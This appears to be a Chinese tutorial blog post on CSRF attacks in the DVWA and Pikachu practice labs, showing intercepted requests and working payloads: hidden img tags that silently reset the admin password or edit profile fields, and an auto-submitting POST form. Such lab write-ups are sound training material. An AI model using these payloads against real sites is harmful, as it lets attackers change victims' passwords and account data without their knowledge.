当前位置: 首页 > news >正文

CSRF

  1. 基于DVWA的low级别实现CSRF攻击
    首先我们运行靶场来准备实验,难度级别调制low
    默认账号密码adminpassword
    来到CSRF输入新密码
    我们burp抓包可以看到GET /vulnerabilities/csrf/?password_new=123456&password_conf=123456&Change=Change密码直接在GET请求里
    图片
    把URL中的密码改成123放包,可以看到成功了
    图片
    接下来验证一下,退出登录-->账号密码输入admin,123
    图片
    可以看到登录成功
    咱们在DVWA下csrf目录下中写一个a.html,内容是
点击查看代码
<img src="http://192.168.222.128:8088/vulnerabilities/csrf/?password_new=password&password_conf=password&Change=Chang" border=”0” style=”display:none;”/>
<h1>密码修改成功!<h1>

我们来访问一下图片
接下来验证一下,退出登录-->账号密码输入admin,password
图片
成功利用
2. Pikachu漏洞练习平台
(1).CSRF(get)
来到CSRF,点一下提示
图片
可以看到vince/allen/kobe/grady/kevin/lucy/lili这么多账号,密码全部是123456
我们随便登录一个allen
图片
看到可以修改个人信息点一下,burp抓包
图片
修改参数放包
图片
可以看到成功了
咱们在CSRF目录下写一个a.html,内容是

点击查看代码
<img src="http://192.168.222.128/vul/csrf/csrfget/csrf_get_edit.php?sex=hach&phonenum=hach!&add=hach!&email=hach!&submit=submit" border=”0” style=”display:none;”/>
<h1>参数修改成功!<h1>

访问这个页面图片
咱们在回到原来的登录页面
图片
可以看到成功利用
(2).CSRF(post)
登录luck,密码123456
图片
点一下修改个人信息,burp抓包
图片
不能像上面一样用GET修改,咱们在CSRF目录下写一个a.html,内容是

点击查看代码
<html>
<head>
<script>
window.onload = function() {document.getElementById("postsubmit").click();
}
</script>
</head>
<body>
<form method="post" action="http://192.168.222.128/vul/csrf/csrfpost/csrf_post_edit.php"><input id="sex" type="text" name="sex" value="God" /><input id="phonenum" type="text" name="phonenum" value="BJernsen" /><input id="add" type="text" name="add" value="I'm hacker" /><input id="email" type="text" name="email" value="BJernsen@pikachu.com" /><input id="postsubmit" type="submit" name="submit" value="submit" />
</form>
</body>
</html>

然后访问a.html
图片
可以看到修改成功

http://www.gsyq.cn/news/767.html

相关文章:

  • 【日记】拜托,丝之歌不开挂真的能打得过吗(975 字)
  • 2025天津大学预推免机试题解
  • 数据挖掘与隐私:你真的匿名了吗?
  • 饮酒其五
  • 简单的sql注入方法
  • socket重定义错误
  • 实用的软件
  • 使用-Jest-测试-VueJS-组件-全-
  • 基于C#实现照片条形码识别
  • 虚拟内存不足怎么解决?虚拟内存不足的原因及解决方法
  • Tekla门钢边柱节点源码
  • 由于裁剪的图片较小
  • 周总结报告6
  • ubuntu22.04安装cuda11.8+python3.12+pytorch2.6.0
  • 自己改造的一个ES的Reindex开源工具
  • CF1379
  • 备战软考4
  • P11364 [NOIP2024] 树上查询
  • pb9新建“项目”选项卡中文说明
  • 场论笔记(一)哈密顿算子的总结
  • PDF处理控件Aspose.PDF教程:使用 Python 将 PDF 转换为 Base64
  • IronOCR 2025.9 重磅发布:内存优化突破,TIFF文档处理内存占用可降低98%!
  • 81、核对两个表格或者核对两个表格中的其中一例数据
  • Linux内核空间与用户空间详解
  • Stable Diffusion 入门:不用本地部署也能轻松上手体验
  • 我的linux之路
  • 前端-支付宝小游戏开发接入指南
  • 打折代码
  • pb9对象中文说明
  • AIGEO重塑商业新规则